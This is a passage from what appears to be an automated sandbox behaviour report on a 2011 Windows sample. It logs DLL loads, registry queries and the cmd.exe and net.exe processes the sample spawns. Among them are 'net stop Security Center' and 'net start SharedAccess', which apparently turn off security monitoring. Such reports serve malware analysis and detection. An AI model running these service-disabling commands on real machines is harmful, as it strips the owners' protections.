Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: PathCompletionChar	success or wait	1595439200
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: AutoRun	success or wait	1595439459
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: DisableUNCCheck	object name not found	1595439794
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: EnableExtensions	success or wait	1595440061
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: DelayedExpansion	object name not found	1595440319
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: DefaultColor	success or wait	1595466223
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: CompletionChar	success or wait	1595472138
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: PathCompletionChar	object name not found	1595472595
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: AutoRun	object name not found	1595472866
Memory allocated	PID: 1960 Path: C:\WINDOWS\system32\cmd.exe Base: 970000 Length: 13FE10 Allocation Type: null Protection: page read and write	success or wait	1595475295
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 980000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1595572507
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 990000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1595575144
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1595594759
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 990000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1595603019
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: write and read and execute Type: commit Baseaddress: AC0000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1595629024
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: AC0000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1595630682
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: write and read and execute Type: commit Baseaddress: AC0000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1595642000
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: AC0000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1595650263
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: 990000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1596157628
Process created	PID: 1520 Path: C:\WINDOWS\system32\net.exe Cmdline: net stop Security Center Createflags: suspended	success or wait	1596438249

Analysis File: cmd.exe PID: 252 Parent PID: 808

Sections

General
Start time:	07:41:13
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\cmd.exe
Commandline:	cmd /c net start SharedAccess
Imagebase:	0x4ad00000
File size:	389120 bytes
MD5 hash:	6D778E0F95447E6546553EEEA709D03C

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	270000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	290000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	2E0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	330000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	340000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	480000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	490000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	410000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	970000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	970000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	440000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	440000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	970000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	980000	57344	own pid	read write	success or wait	1	4AD031C5
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	990000	126976	own pid	execute	success or wait	1	4AD031C5
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	4AD031C5
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	990000	1208320	own pid	readonly	success or wait	1	4AD031C5
C:\WINDOWS\system32\net.exe	write and read and execute	commit	AC0000	45056	own pid	execute	success or wait	2	4AD031C5
C:\WINDOWS\system32\net.exe	query and read	commit	AC0000	45056	own pid	readonly	success or wait	2	4AD031C5
C:\WINDOWS\system32\net.exe	query and read	commit	990000	45056	own pid	readonly	success or wait	1	4AD031C5

Registry Activities:

Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	DisableUNCCheck	object name not found	2	4AD04A2A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	EnableExtensions	success or wait	2	4AD04A4F
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	DelayedExpansion	object name not found	2	4AD04A88
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	DefaultColor	success or wait	2	4AD04AAD
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	CompletionChar	success or wait	1	4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	PathCompletionChar	success or wait	1	4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	AutoRun	success or wait	1	4AD04BB8
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	CompletionChar	success or wait	1	4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	PathCompletionChar	object name not found	1	4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager	AutoRun	object name not found	1	4AD04BB8

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
1452	C:\WINDOWS\system32\net.exe	net start SharedAccess	suspended	success or wait	1	4AD031C5

Memory Activities:

Memory allocated
PID	Filepath	Base	Length	Protection	Completion	Count	Source Address
252	C:\WINDOWS\system32\cmd.exe	970000	13FE10	page read and write	success or wait	1	4AD04578

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1596509866
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1596648097
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1596649162
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1596758993
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1596839042
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1597003840
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1597006702
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1597007421
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1597014607
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 340000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1597021232
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1597033776
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1597035461
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1597046469
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1597048848
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1597050977
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1597054277
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1597062592
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1597088482
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1597107816
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1597123062
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1597129494
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1597131400
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1597136884
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1597144075
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1597159413
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 490000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1597190974
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1597226624
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1597228244
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1597229800
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 970000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1597368797
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 970000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1597435757
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1597441191
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 440000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1597482299
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1597499153
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1597505022
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1597561497
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 970000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1597579310
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DisableUNCCheck	object name not found	1597619884
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: EnableExtensions	success or wait	1597620180
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DelayedExpansion	object name not found	1597620439
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DefaultColor	success or wait	1597620702
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: CompletionChar	success or wait	1597620977
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: PathCompletionChar	success or wait	1597621274
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: AutoRun	success or wait	1597621533
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DisableUNCCheck	object name not found	1597621855
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: EnableExtensions	success or wait	1597622130
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DelayedExpansion	object name not found	1597622388
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DefaultColor	success or wait	1597622647
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: CompletionChar	success or wait	1597622904
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: PathCompletionChar	object name not found	1597623163
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: AutoRun	object name not found	1597623422
Memory allocated	PID: 252 Path: C:\WINDOWS\system32\cmd.exe Base: 970000 Length: 13FE10 Allocation Type: null Protection: page read and write	success or wait	1597626322
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 980000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1597674239
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 990000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1597676928
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1597678620
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 990000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1597682056
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: write and read and execute Type: commit Baseaddress: AC0000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1597719267
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: AC0000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1597721093
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: write and read and execute Type: commit Baseaddress: AC0000 Size: 45056 Protection: execute Mapped to pid: own pid	success or wait	1597724788
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: AC0000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1597726544
Section loaded	Path: C:\WINDOWS\system32\net.exe Access: query and read Type: commit Baseaddress: 990000 Size: 45056 Protection: readonly Mapped to pid: own pid	success or wait	1597768624
Process created	PID: 1452 Path: C:\WINDOWS\system32\net.exe Cmdline: net start SharedAccess Createflags: suspended	success or wait	1597787328

Analysis File: net.exe PID: 1520 Parent PID: 1960

Sections

General
Start time:	07:41:14
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\net.exe
Commandline:	net stop Security Center
Imagebase:	0x1000000
File size:	42496 bytes
MD5 hash:	FD3DA8425624B98903407DF608CF2C11

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
\KnownDlls\MPR.dll	write and read and execute	image	71B20000	73728	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	1020000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	8B0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	8B0000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	8B0000	57344	own pid	read write	success or wait	1	1001D71
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	8C0000	126976	own pid	execute	success or wait	1	1001D71
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	1001D71
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	8C0000	1208320	own pid	readonly	success or wait	1	1001D71
C:\WINDOWS\system32\net1.exe	write and read and execute	commit	9F0000	126976	own pid	execute	success or wait	2	1001D71
C:\WINDOWS\system32\net1.exe	query and read	commit	9F0000	126976	own pid	readonly	success or wait	2	1001D71
C:\WINDOWS\system32\net1.exe	query and read	commit	8C0000	126976	own pid	readonly	success or wait	1	1001D71

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
1528	C:\WINDOWS\system32\net1.exe	net1 stop Security Center	suspended	success or wait	1	1001D71

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1600103877
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1600756457
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1600779981
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1600781830
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1600828818
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1600885670
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1600964536
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1600973174
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1601040812
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1601109603
Section loaded	Path: \KnownDlls\MPR.dll Access: write and read and execute Type: image Baseaddress: 71B20000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	1601185840
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1601252474
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1601262427
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1601340437
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1601520575
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1601599911
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1601627640
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1601635459
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1601658596
